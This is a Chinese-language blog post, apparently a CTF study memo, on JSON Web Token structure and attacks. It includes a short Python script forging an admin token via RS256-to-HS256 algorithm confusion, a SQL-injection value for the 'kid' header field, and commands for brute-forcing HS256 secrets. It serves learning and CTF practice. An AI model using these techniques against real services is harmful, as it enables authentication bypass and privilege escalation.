<!DOCTYPE html>





<html lang="Chinese">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/head.jpg?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/head.jpg?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/head.jpg?v=7.3.0">
  <link rel="mask-icon" href="/images/head.jpg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Kopieren',
      copy_success: 'Kopiert',
      copy_failure: 'Kopieren fehlgeschlagen'
    }
  };
</script>

  <meta name="description" content="说在前面这一段时间遇到两次JWT的CTF题，本想好好整理一下，结果搜到一篇文章把我想整理的全写出来了。 文章地址：https://www.anquanke.com/post/id/145540 所以这里就只作为一个备忘录，简单总结一下。 JWT (JSON Web Token)最常用的网址：https://jwt.io/ JWT由三部分组成：Header(头部), Payload(负载), Sig">
<meta name="keywords" content="JWT">
<meta property="og:type" content="article">
<meta property="og:title" content="JWT备忘录">
<meta property="og:url" content="http://yoursite.com/2019/05/17/JWT备忘录/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="说在前面这一段时间遇到两次JWT的CTF题，本想好好整理一下，结果搜到一篇文章把我想整理的全写出来了。 文章地址：https://www.anquanke.com/post/id/145540 所以这里就只作为一个备忘录，简单总结一下。 JWT (JSON Web Token)最常用的网址：https://jwt.io/ JWT由三部分组成：Header(头部), Payload(负载), Sig">
<meta property="og:locale" content="Chinese">
<meta property="og:updated_time" content="2019-08-23T06:17:43.035Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="JWT备忘录">
<meta name="twitter:description" content="说在前面这一段时间遇到两次JWT的CTF题，本想好好整理一下，结果搜到一篇文章把我想整理的全写出来了。 文章地址：https://www.anquanke.com/post/id/145540 所以这里就只作为一个备忘录，简单总结一下。 JWT (JSON Web Token)最常用的网址：https://jwt.io/ JWT由三部分组成：Header(头部), Payload(负载), Sig">
  <link rel="canonical" href="http://yoursite.com/2019/05/17/JWT备忘录/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>JWT备忘录 | Threezh1's blog</title>
  <meta name="generator" content="Hexo 3.8.0">
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?41896264c6b7bfbb2d9ae9719e4440c2";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>






  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="Chinese">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Threezh1's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">分享学习、分享想法</p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Navigationsleiste an/ausschalten">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Startseite</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archiv</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-threeday">
      
    

    <a href="http://119.3.219.188/" rel="noopener" target="_blank"><i class="menu-item-icon fa fa-fw fa-Threeday"></i> <br>Threeday</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/05/17/JWT备忘录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Threezh1">
      <meta itemprop="description" content="Share learn & Share life.">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Threezh1's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">JWT备忘录

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Veröffentlicht am</span>

              
                
              

              <time title="Erstellt: 2019-05-17 14:08:22" itemprop="dateCreated datePublished" datetime="2019-05-17T14:08:22+08:00">2019-05-17</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Bearbeitet am</span>
                <time title="Geändert am: 2019-08-23 14:17:43" itemprop="dateModified" datetime="2019-08-23T14:17:43+08:00">2019-08-23</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">in</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Learning/" itemprop="url" rel="index"><span itemprop="name">Learning</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="说在前面"><a href="#说在前面" class="headerlink" title="说在前面"></a>说在前面</h2><p>这一段时间遇到两次JWT的CTF题，本想好好整理一下，结果搜到一篇文章把我想整理的全写出来了。</p>
<p>文章地址：<a href="https://www.anquanke.com/post/id/145540" target="_blank" rel="noopener">https://www.anquanke.com/post/id/145540</a></p>
<p>所以这里就只作为一个备忘录，简单总结一下。</p>
<h2 id="JWT-JSON-Web-Token"><a href="#JWT-JSON-Web-Token" class="headerlink" title="JWT (JSON Web Token)"></a>JWT (JSON Web Token)</h2><p>最常用的网址：<a href="https://jwt.io/" target="_blank" rel="noopener">https://jwt.io/</a></p>
<p>JWT由三部分组成：Header(头部), Payload(负载), Signature(签名)</p>
<pre><code>格式为：
Header.Payload.Signature

例如：(HS256)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

或 (RS256)
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.POstGetfAytaZS82wHcjoTyoqhMyxXiWdR7Nn7A29DNSl0EiXLdwJ6xC6AfgZWF1bOsS_TuYI3OG85AmiExREkrS6tDfTQ2B3WXlrr-wp5AokiRbz3_oB4OxG-W9KcEEbDRcZc0nH3L7LzYptiy1PtAylQGxHTWZXtGz4ht0bAecBgmpdgXMguEIcoqPJ1n3pIWk_dUZegpqx0Lka21H6XxUTxiy8OcaarA8zdnPUnV6AmNP3ecFawIFYdvJB_cm-GvpCSbr8G8y_Mllj8f4x9nBH8pQux89_6gUY618iYv7tuPWBFfEbLxtF2pZS6YC1aSfLQxeNe8djT9YjpvRZA
</code></pre><p>Header:</p>
<pre><code>{
  &quot;alg&quot;: &quot;HS256&quot;,
  &quot;typ&quot;: &quot;JWT&quot;
}

alg属性表示签名的算法 (默认是 HMAC SHA256 即HS256)
typ属性表示这个令牌（token）的类型（type），JWT 令牌统一写为JWT
</code></pre><p>Payload:</p>
<pre><code>{
  &quot;sub&quot;: &quot;1234567890&quot;,
  &quot;name&quot;: &quot;John Doe&quot;,
  &quot;admin&quot;: true
}

除了官方字段，还可以添加自定义字段。如这里的admin字段就是自定义字段。
</code></pre><p>Signature:</p>
<pre><code>Signature 部分是对前两部分的签名，防止数据篡改。

服务器使用一个指定的密钥，按照下面的签名算法(默认为HS256)产生签名
(RS256有一个公钥和一个私钥)

HMACSHA256(
  base64UrlEncode(header) + &quot;.&quot; +
  base64UrlEncode(payload),
  secret)

RSASHA256(
  base64UrlEncode(header) + &quot;.&quot; +
  base64UrlEncode(payload),
  PUBLIC KEY, PRIVATE KEY)
</code></pre><p>然后将这三个部分分别base64编码后用“.”连接生成JSON Web Token</p>
<p>话说文章里面的名字取的还蛮不错的。<br><a id="more"></a></p>
<h3 id="算法修改攻击"><a href="#算法修改攻击" class="headerlink" title="算法修改攻击"></a>算法修改攻击</h3><p>条件：</p>
<pre><code>JWT使用RS256攻击
公钥可知
不可解密私钥(怎么解密也不知道)
</code></pre><p>利用：</p>
<p>将公钥作为HS256的密钥</p>
<p>使用python脚本生成(用jwt.io生成的用不了)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">public = open(<span class="string">'key.txt'</span>, <span class="string">'r'</span>).read()</span><br><span class="line">print(jwt.encode(&#123;<span class="string">"name"</span>: <span class="string">"name"</span>,<span class="string">"priv"</span>: <span class="string">"admin"</span>&#125;, key=public, algorithm=<span class="string">'HS256'</span>))</span><br></pre></td></tr></table></figure>
<p>报错请参考文章内的解决办法</p>
<h3 id="Header头中存在kid字段"><a href="#Header头中存在kid字段" class="headerlink" title="Header头中存在kid字段"></a>Header头中存在kid字段</h3><p>通过key查询私钥的语句类似于：</p>
<pre><code>sql=&quot;select * from table where kid=$kid&quot;
</code></pre><p>将kid修改为：</p>
<pre><code>kid = 0 union select 12345
</code></pre><p>根据环境情况修改kid的值，目的是得到或者控制私钥。</p>
<pre><code>openssl常用命令

//生成私钥
openssl
OpenSSL&gt; genrsa -out rsa_private_key.pem 1024 
//产生公钥
OpenSSL&gt; rsa -in rsa_private_key.pem -pubout -out rsa_public_key.pem writing RSA key
</code></pre><h3 id="密钥爆破"><a href="#密钥爆破" class="headerlink" title="密钥爆破"></a>密钥爆破</h3><p>HS256可以尝试一下爆破</p>
<pre><code>工具： https://github.com/brendan-rius/c-jwt-cracker

使用： ./jwtcrack 加密值
</code></pre><p>使用字典爆破</p>
<pre><code>工具： https://github.com/Sjord/jwtcrack

使用： crackjwt.py JWT dictionary.txt
</code></pre><h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ul>
<li><a href="https://www.anquanke.com/post/id/145540" target="_blank" rel="noopener">https://www.anquanke.com/post/id/145540</a></li>
<li><a href="https://chybeta.github.io/2017/08/29/HITB-CTF-2017-Pasty-writeup/" target="_blank" rel="noopener">https://chybeta.github.io/2017/08/29/HITB-CTF-2017-Pasty-writeup/</a></li>
<li><a href="http://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html" target="_blank" rel="noopener">http://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html</a></li>
</ul>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/JWT/" rel="tag"># JWT</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2019/05/15/川师线下CTF-Web-Writeup/" rel="next" title="川师线下CTF Writeup">
                  <i class="fa fa-chevron-left"></i> 川师线下CTF Writeup
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/05/18/PHP代码审计之重装漏洞/" rel="prev" title="PHP代码审计之重装漏洞">
                  PHP代码审计之重装漏洞 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc" data-target="post-toc-wrap">
          Inhaltsverzeichnis
        </li>
        <li class="sidebar-nav-overview" data-target="site-overview-wrap">
          Übersicht
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc">
            <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#说在前面"><span class="nav-number">1.</span> <span class="nav-text">说在前面</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JWT-JSON-Web-Token"><span class="nav-number">2.</span> <span class="nav-text">JWT (JSON Web Token)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#算法修改攻击"><span class="nav-number">2.1.</span> <span class="nav-text">算法修改攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Header头中存在kid字段"><span class="nav-number">2.2.</span> <span class="nav-text">Header头中存在kid字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#密钥爆破"><span class="nav-number">2.3.</span> <span class="nav-text">密钥爆破</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">3.</span> <span class="nav-text">参考</span></a></li></ol></div>
          </div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Threezh1</p>
  <div class="site-description motion-element" itemprop="description">Share learn & Share life.</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">Artikel</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">Kategorien</span>
        
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">schlagwörter</span>
        
      </div>
    
  </nav>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://github.com/Threezh1" title="GitHub &rarr; https://github.com/Threezh1" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
    
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://weibo.com/u/5515566558" title="Weibo &rarr; https://weibo.com/u/5515566558" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
      </span>
    
  </div>



        </div>
      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Threezh1</span>
</div>
  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Design – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.3.0</div>

        












        
      </div>
    </footer>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.3.0"></script><script src="/js/motion.js?v=7.3.0"></script>
<script src="/js/schemes/pisces.js?v=7.3.0"></script>
<script src="/js/next-boot.js?v=7.3.0"></script>



  





















  

  

  


  
  <script src="/js/post-details.js?v=7.3.0"></script>


</body>
</html>
